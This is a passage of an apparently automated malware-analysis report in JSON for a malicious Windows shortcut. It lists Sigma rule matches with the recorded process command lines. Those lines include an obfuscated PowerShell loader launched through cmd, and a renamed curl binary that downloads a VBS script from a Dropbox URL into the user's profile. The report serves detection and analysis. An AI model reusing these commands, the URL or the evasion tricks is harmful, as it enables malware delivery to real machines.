"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "de683a6054ff03b9c12e58c842648f759cfcf797f91dc01078d285e8f3f8e856",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Copy From or To System Directory",
"rule_description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\n",
"rule_author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "e90bd630609a035372a71ff4471ee3d2e99ffb6464b8370ef394ea1a4d2c36f9",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Renamed CURL.EXE Execution",
"rule_description": "Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7752bbd4e940ef58081260cfa45b4ac6b149e2cecb836d79f5e61bfbdc237105",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "File And SubFolder Enumeration Via Dir Command",
"rule_description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "low",
"rule_id": "ec63f6d5ea6cf1a23c7c491b28d6b350219d23a95ea95516ce0256730fb7912c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Local Accounts Discovery",
"rule_description": "Local accounts, System Owner/User discovery using operating systems utilities",
"rule_author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
}
],
"type_tag": "lnk",
"magika": "LNK",
"type_description": "Windows shortcut",
"crowdsourced_ids_stats": {
"high": 0,
"medium": 0,
"low": 0,
"info": 1
},
"md5": "ba8e682a72c6a3e634c070f0fb057bf5",
"total_votes": {
"harmless": 0,
"malicious": 1
},
"sigma_analysis_stats": {
"critical": 0,
"high": 5,
"medium": 8,
"low": 3
